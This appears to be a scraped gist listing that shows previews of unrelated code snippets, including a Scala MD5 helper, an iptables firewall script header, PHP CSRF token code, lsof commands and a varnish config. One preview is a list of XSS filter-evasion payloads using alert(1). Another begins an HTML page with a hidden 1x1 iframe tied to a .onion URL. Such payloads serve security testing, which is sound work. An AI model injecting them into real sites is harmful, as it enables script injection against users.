Please see: https://github.com/kevinSuttle/html-meta-tags, thanks for the idea @dandv!
Copied from http://code.lancepollard.com/complete-list-of-html-meta-tags/
| object MD5 { | |
| def hash(s: String) = { | |
| val m = java.security.MessageDigest.getInstance("MD5") | |
| val b = s.getBytes("UTF-8") | |
| m.update(b, 0, b.length) | |
| new java.math.BigInteger(1, m.digest()).toString(16) | |
| } | |
| } |
| # This script is a basic IPTables server firewall with defenses against some | |
| # of the most common attack types. | |
| # | |
| # Basically you just have to add/remove ports in the first part of this script | |
| # and you should be ready to go. | |
| # | |
| # Help, comments and improvements always appreciated, also, feel free to | |
| # use, change and distribute. Cheers | |
| ip=/usr/sbin/iptables |
| <?php | |
| // See: http://blog.ircmaxell.com/2013/02/preventing-csrf-attacks.html | |
| // Start a session (which should use cookies over HTTP only). | |
| session_start(); | |
| // Create a new CSRF token. | |
| if (! isset($_SESSION['csrf_token'])) { | |
| $_SESSION['csrf_token'] = base64_encode(openssl_random_pseudo_bytes(32)); | |
| } |
| # references | |
| # https://www.thegeekstuff.com/2012/08/lsof-command-examples/ | |
| # list open network files | |
| sudo lsof -PiTCP -sTCP:LISTEN | |
| # list files opened by a process | |
| lsof -c ssh |
| # Configuration file for varnish | |
| # | |
| # /etc/init.d/varnish expects the variables $DAEMON_OPTS, $NFILES and $MEMLOCK | |
| # to be set from this shell script fragment. | |
| # | |
| # Should we start varnishd at boot? Set to "no" to disable. | |
| START=yes | |
| # Maximum number of open files (for ulimit -n) |
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
| package main | |
| import ( | |
| "os" | |
| "log" | |
| "net" | |
| "strconv" | |
| "strings" | |
| ) |
| //nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe: | |
| <html> | |
| <body> | |
| <iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe> | |
| </body> | |
| </html> | |
| <script> |
| <?php | |
| echo "var_dump(...)\n"; | |
| echo "\n"; | |
| echo "PHP_INT_MAX : "; | |
| var_dump(PHP_INT_MAX); | |
| echo "PHP_INT_MAX + 1 : "; | |
| var_dump(PHP_INT_MAX + 1); |